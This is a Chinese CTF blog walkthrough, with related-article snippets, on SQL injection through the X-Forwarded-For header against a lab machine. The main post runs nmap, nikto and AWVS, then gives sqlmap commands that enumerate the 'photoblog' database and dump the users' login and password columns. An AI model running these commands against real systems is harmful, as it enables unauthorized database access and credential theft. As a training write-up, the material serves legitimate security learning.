CTF-SQL注入-X-Forwarded-For报文头

最新推荐文章于 2024-05-23 19:00:00 发布
最新推荐文章于 2024-05-23 19:00:00 发布
阅读量1.3k 收藏 3
点赞数 1
分类专栏: 视频学习 学习笔记 网络安全 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whatiwhere/article/details/84727752
版权

在这里插入图片描述在这里插入图片描述

nmap -sV xxxxx
在这里插入图片描述

nmap -T4 -A -v xxxx
在这里插入图片描述

nikto -host http://192.168.173.134/
在这里插入图片描述
发现了后台登陆地址,但弱口令无法登陆
使用awvs扫描 安全漏洞
在这里插入图片描述
高危漏洞 盲注
使用sqlmap进行 注入
在这里插入图片描述

sqlmap -u “http://192.168.176.134/” --headers=“X-Forwarded-For:*” --dbs --batch

python sqlmap.py -u “http://192.168.176.134/” --headers=“X-Forwarded-For:*” --dbs --batch
得到两个数据库名
在这里插入图片描述

python sqlmap.py -u “http://192.168.176.134/” --headers=“X-Forwarded-For:*” -D “photoblog” --tables --batch

在这里插入图片描述

python sqlmap.py -u “http://192.168.176.134/” --headers=“X-Forwarded-For:*” -D “photoblog” -T “users” --columns --batch

在这里插入图片描述
python sqlmap.py -u “http://192.168.176.134/” --headers=“X-Forwarded-For:*” -D “photoblog” -T “users” -C “login,password” --dump --batch
得到管理员密码
在这里插入图片描述

whatiwhere
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF之路:关于X-Forwarded-For注入
zw05011的博客
01-05 3038
题目 输入任意用户名密码登录,显示IP禁止访问。 知识点 伪造XFF绕过服务器IP过滤 IP伪造 TCP/IP层面的IP伪造很难实现,因为更改后很难实现正常的TCP通信,但在HTTP层面的伪造就显得很容易。可以通过伪造XFF进行IP伪造 XFF字段 X-Forwarded-For(XFF)简称XFF,是HTTP 报文部的关键字段之一。代表了HTTP的请求端真实的IP。它被认为是客户端通过HTTP代理或者负载均衡器连接到web服务端获取源ip地址的一个标准(通常一些网站的防注入..
CTF-sql注入(X-Forwarded-For)【简单易懂】
不知名白帽的博客
08-21 1426
CTF-sql注入(X-Forwarded-For)【简单易懂】
[CTF_网络安全] 攻防世界 xff_referer 解题详析
最新发布
qingkahui24689的博客
05-23 1803
[CTF_网络安全] 攻防世界 xff_referer 解题详析,该题结合抓包改包姿势考察XFF及referer,读者可躬身实践。,我们下次见。
CTF-SQL注入(X-Forwarded-For)
su__xiaoyan的博客
12-24 567
SQL注入 当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 X-Forwarded-For HTTP请求部字段,用来表示 HTTP 请求端真实 IP。 XFF注入/ X-Forwarded-For XFF,是X-Forwarded-for的缩写,XFF注入是SQL注入的一种,该注入原理是通过修改X-Forwarded-for对带入系统的dns进行sql注
CTF训练 web安全SQl注入(X-Forwarded-For报文)
梁辰兴的博客
11-05 508
SQl注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQl语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。任何一个用户可以输入的位置都可能是注入点,比如url中,以及http报文中。只要是用户可以输入的位置都是有可能存在注入点的!
http细节
evsqiezi
07-25 424
X-Forwarded-For 通过名字就知道,X-Forwarded-For 是一个 HTTP 扩展部。HTTP/1.1(RFC 2616)协议并没有对它的定义,它最开始是由 Squid 这个缓存代理软件引入,用来表示 HTTP 请求端真实 IP。如今它已经成为事实上的标准,被各大 HTTP 代理、负载均衡等转发服务广泛使用,并被写入 RFC 7239(Forwarded HTTP Ex
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-反编译相关资料
03-11
包括学习的PPT,常见的用于反编译的工具,CaptfEncoder-win-x64-3.1.2.exe、CTF-Tools-v1.3.7.zip、GDA4.02.zip、jadx-gui-1.4.3-with-jre-win.zip
CTF】X-Forwarded-For SQL注入实战
HAPPY
07-30 4651
1.首先burp抓包,分析post包,保存为txt文件 (可看这个 https://blog.csdn.net/u014549283/article/details/81290015 ,此处用 -r 参数) 2、使用sqlmap进行注入 爆数据库 sqlmap -r xxx.txt --dbs --batch   爆表名 sqlmap -r xxx.txt -D 数据库名 --tab...
CTF-sql注入(X-Forwarded-For)
Reaches_r的博客
08-05 277
1.扫描目标IP发现只开了80http服务 2.进去有个登录界面,考虑sql注入得到账户密码 3.启动AWVS(AcunetixWeb Vulnarability Scanner)添加目标,扫描发现存在X-Forwarded-For注入漏洞 4.使用sqlmap注入攻击(--batch表示自动回应询问) (1)得到数据库名 (2)同理得到表名、列名,暴力破解出账户密码 5.登录后台,上传webshell,控制目标,具体步骤参考前面的文章。 ...
CTF-Sql注入X-Forwarded-For(bind sql injecion)
IT小学子的博客
05-03 221
nmap -sV 192.168.1.103 awvs漏洞扫描器 漏洞利用 利用sqlmap sqlmap -u url --headers="X-Forwarded-For:*" --dbs --batch sqlmap -u http://192.168.1.103 --headers="X-Forwarded-For:*" -D photoblog --tables --batch ...
CTF练习:SQL注入之X-Forwarded-For报
qq_43233085的博客
11-28 979
CTF练习:SQL注入之get参数注入环境准备信息收集漏洞挖掘sqlmap注入上传shell脚本(copy)拿到靶机shell(copy) 靶机地址: 链接: https://pan.baidu.com/s/1u-br8L4Lk4X7EGS7kROhMQ 提取码: 2fmj 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172....
X-Forwarded-For注入实战
qq_38807738的博客
06-06 6669
X-Forwarded-For注入漏洞实战1、使用BurpSuite抓包POST /index.php HTTP/1.1Host: 219.153.49.228:47065User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0Accept: text/html,application...
安鸾靶场X-Forwarded-For注入注入,Cooike注入训练,手注+sqlmap操作
AAAAAAAAAAAA66的博客
12-29 939
前言:凡是直接将数据带入数据库查询的,都有可能会导致sql注入。 后台服务器存储着cooike,XFF的信息,当我们每次发包与后台交互时,后台就会将这我们的数据带入数据库中查询,就会造成Cooike注入,XFF注入。 虽然题目好像出了点问题,但不妨碍我们学习。 目录 xff注入 手注 sqlmap Cooike注入 手注 sqlmap命令 方法一 方法二 xff注入 题目链接:http://www.whalwl.work:8010/ 进入之后直接用bp抓包,放在re...
Cookie注入和X-Forwarded-For注入
天天学安全专属博客
11-22 868
Cookie注入和X-Forwarded-For注入,sql注入详解,最详细的sql注入方式,和sql注入语句
CTF 总结03:SQL注入
weixin_42789937的博客
02-25 414
CTF 总结03:SQL注入,在此整理一篇答题合集,适合与我一样对与SQL知道那么一点点,但是又不怎么熟悉流程的小白~
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值